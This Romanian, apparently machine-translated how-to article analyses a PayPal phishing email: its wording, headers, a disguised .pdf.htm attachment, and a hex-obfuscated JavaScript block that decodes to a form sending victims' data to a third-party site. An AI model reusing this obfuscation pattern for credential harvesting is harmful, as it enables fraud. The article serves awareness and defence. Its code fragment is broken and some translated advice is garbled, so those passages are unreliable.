If-Koubou

Securitatea online: ruperea anatomiei unui e-mail de phishing

Securitatea online: ruperea anatomiei unui e-mail de phishing (Cum să)


În lumea de astăzi, unde informația fiecăruia este online, phishingul este unul dintre cele mai populare atacuri online și devastatoare, pentru că puteți curăța întotdeauna un virus, dar dacă detaliile dvs. bancare sunt furate, aveți probleme. Iată o defalcare a unui astfel de atac pe care l-am primit.

Nu credeți că sunt doar detaliile dvs. bancare importante: la urma urmei, dacă cineva obține controlul asupra contului dvs. de conectare, nu numai că cunoaște informațiile conținute în acel cont, ci șansele sunt că aceleași informații de conectare pot fi utilizate pe diverse alte conturi. Și dacă vă compromite contul de e-mail, aceștia vă pot reseta toate celelalte parole.

Deci, în plus față de păstrarea parolelor puternice și variate, trebuie să fiți mereu în căutarea unor email-uri false care să se comporte ca un lucru real. În timp ce cele mai multe încercări de phishing sunt amateurice, unele sunt destul de convingătoare, așa că este important să înțelegem cum să le recunoaștem la nivel de suprafață, precum și cum funcționează sub capota.

Imagine de asirap

Examinați ceea ce este în vedere simplă

Exemplul nostru de e-mail, la fel ca cele mai multe încercări de phishing, "vă anunță" despre activitatea dvs. din contul dvs. PayPal, care ar fi, în condiții normale, alarmantă. Deci, apelul la acțiune este să verifici / să-ți restabilești contul, trimițând aproape orice informație personală despre care te poți gândi. Din nou, acest lucru este destul de formic.

Deși există cu siguranță excepții, aproape orice e-mail de phishing și înșelătorie este încărcat cu steaguri roșii direct în mesaj. Chiar dacă textul este convingător, puteți găsi, de obicei, multe greșeli umflate în tot corpul mesajului, care indică faptul că mesajul nu este legitim.

Corpul mesajelor

La prima vedere, acesta este unul dintre cele mai bune e-mailuri de phishing pe care le-am văzut. Nu există greșeli de ortografie sau gramatică, iar verbiageul citește în funcție de ceea ce vă puteți aștepta. Cu toate acestea, există câteva steaguri roșii pe care le puteți vedea atunci când examinați conținutul un pic mai îndeaproape.

  • "Paypal" - Cazul corect este "PayPal" (capitalul P). Puteți vedea că ambele variante sunt utilizate în mesaj. Companiile sunt foarte deliberate cu branding-ul lor, deci este îndoielnic că așa ceva ar trece procesul de verificare.
  • "Permite ActiveX" - De câte ori ați văzut o afacere legată pe web, dimensiunea Paypal utilizează o componentă de proprietate care funcționează numai pe un singur browser, mai ales când suportă mai multe browsere? Sigur, undeva acolo o face o companie, dar acesta este un steag roșu.
  • "Sigur". - Observați cum acest cuvânt nu se aliniază în margine cu restul textului paragrafului. Chiar dacă aș întinde fereastra un pic mai mult, nu se înfășoară sau spațiul corect.
  • "Paypal!" - Spațiul din fața semnului de exclamare pare ciudat. Doar o altă întrebare pe care eu sunt sigur că nu ar fi într-un e-mail legit.
  • "PayPal - Formular de actualizare a contului.pdf.htm" - De ce ar fi atașat Paypal un "PDF" mai ales atunci când ar putea să se lege doar la o pagină de pe site-ul lor? În plus, de ce ar încerca să ascundă un fișier HTML ca un PDF? Acesta este cel mai mare steag roșu al tuturor.

Antetul mesajului

Când aruncați o privire la antetul mesajului, vor apărea câteva mai multe steaguri roșii:

  • Adresa de la adresa este [email protected].
  • Adresa lipsă. Nu am renunțat la asta, pur și simplu nu face parte din antetul mesajului standard. De obicei, o companie cu numele dvs. vă va personaliza adresa de e-mail.

Atașamentul

Când deschid atașamentul, puteți vedea imediat că aspectul nu este corect deoarece lipsesc informațiile de stil. Din nou, de ce ar fi trimis PayPal un formular HTML atunci când acestea ar putea pur și simplu să vă dea un link pe site-ul lor?

Notă: am folosit vizualizatorul de atașament HTML al Gmail încorporat pentru acest lucru, dar vă recomandăm să nu dezactivați atașamentele de la escrocii. Nu. Vreodată. Acestea conțin foarte multe exploitări care vor instala troieni pe PC-ul dvs. pentru a vă fura informațiile despre cont.

Derulați puțin mai mult, puteți observa că acest formular solicită nu numai informațiile noastre de conectare PayPal, ci și informațiile bancare și cărțile de credit. Unele imagini sunt rupte.

Este evident că această încercare de phishing se întâmplă după totul cu o singură lovitură.

Defalcarea tehnică

Deși ar trebui să fie destul de clar pe baza a ceea ce este clar că aceasta este o încercare de phishing, acum vom descompune machiajul tehnic al e-mailului și vom vedea ce putem găsi.

Informații din atașament

Primul lucru pe care ar trebui să-l aruncăm o privire este sursa HTML a formularului de atașament care este ceea ce transmite datele site-ului fals.

Atunci când vizualizați rapid sursa, toate link-urile apar valide, deoarece indică fie "paypal.com" sau "paypalobjects.com", care sunt ambele legit.

Acum ne vom uita la câteva informații de bază pe care Firefox le adună pe pagină.

După cum puteți vedea, unele dintre grafice sunt extrase din domeniile "blessedtobe.com", "goodhealthpharmacy.com" și "pic-upload.de" în locul domeniilor legale PayPal.

Informații din anteturile de e-mail

Apoi vom arunca o privire asupra anteturilor de e-mail brute. Gmail face acest lucru disponibil prin opțiunea de meniu Afișare original din mesaj.

Privind informațiile antetului pentru mesajul original, puteți vedea că acest mesaj a fost compus folosind Outlook Express 6. Îndoiesc că PayPal are pe cineva din personal care trimite fiecare dintre aceste mesaje manual prin intermediul unui client de e-mail învechit.

Acum, uitandu-ne la informatiile de rutare, putem vedea adresa IP a serverului de expeditor si a serverului de mail.

Adresa IP "User" este expeditorul original. Făcând o căutare rapidă a informațiilor despre IP, putem vedea că IP-ul de expediere se află în Germania.

Și când ne uităm la adresa de e-mail a serverului de trimitere (mail.itak.at), adresa IP, putem vedea că acesta este un ISP cu sediul în Austria. Mă îndoiesc că PayPal își redirecționează e-mailurile direct prin intermediul unui furnizor ISP din Austria, atunci când are o fermă de servere masivă care ar putea face față cu ușurință acestei sarcini.

Unde merge datele?

Deci, am stabilit în mod clar că acesta este un e-mail de phishing și a adunat câteva informații despre locul unde a apărut mesajul, dar cum rămâne cu unde sunt trimise datele dvs.?

Pentru a vedea acest lucru, trebuie mai întâi să salvăm atașamentul HTM la desktop-ul nostru și să îl deschidem într-un editor de text. Trecând prin ea, totul pare a fi în ordine, cu excepția cazului în care ajungem la un blocaj Javascript suspect.

Descoperind sursa completă a ultimului bloc de Javascript, vedem:


// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =“3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e“ y =“pentru (i = 0; i<>

Ori de câte ori vedeți un șir mare de litere aparent aleatoare și numere încorporate într-un bloc Javascript, este de obicei ceva suspect. Privind codul, variabila "x" este setată la acest șir mare și apoi decodificată în variabila "y". Rezultatul final al variabilei "y" este apoi scris în document ca HTML.

Deoarece șirul mare este format din cifrele 0-9 și literele a-f, este cel mai probabil codificat printr-o conversie ASCII la Hex simplă:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

Translati la:

Nu este o coincidență faptul că acest lucru se decodifică într-o etichetă validă a formularului HTML care trimite rezultatele nu către PayPal, ci către un site necinstit.

În plus, când vizualizați sursa HTML a formularului, veți vedea că această etichetă de formular nu este vizibilă, deoarece este generată în mod dinamic prin Javascript. Acesta este un mod inteligent de a ascunde ceea ce face de fapt HTML dacă cineva ar vedea pur și simplu sursa generată de atașament (așa cum am făcut mai devreme), spre deosebire de deschiderea atașamentului direct într-un editor de text.

Făcând un Whois rapid pe site-ul ofensator, putem vedea că acesta este un domeniu găzduit de o gazdă web populară, 1and1.

Ceea ce se remarcă este că domeniul utilizează un nume lizibil (spre deosebire de ceva de genul "dfh3sjhskjhw.net"), iar domeniul a fost înregistrat timp de 4 ani. Din acest motiv, cred că acest domeniu a fost deturnat și folosit ca pion în această încercare de phishing.

Cynicismul este o apărare bună

Când vine vorba de a rămâne în siguranță online, nu doare niciodată să aibă un bun cinism.

Deși sunt sigur că există mai multe steaguri roșii în exemplul de e-mail, ceea ce am subliniat mai sus sunt indicatorii pe care i-am văzut după doar câteva minute de examinare. Din punct de vedere ipotetic, dacă nivelul de suprafață al e-mailului și-a imitat 100% omologul său legitim, analiza tehnică ar dezvălui în continuare adevărata sa natură. Acesta este motivul pentru care este importat să puteți examina atât ce puteți și ce nu puteți vedea.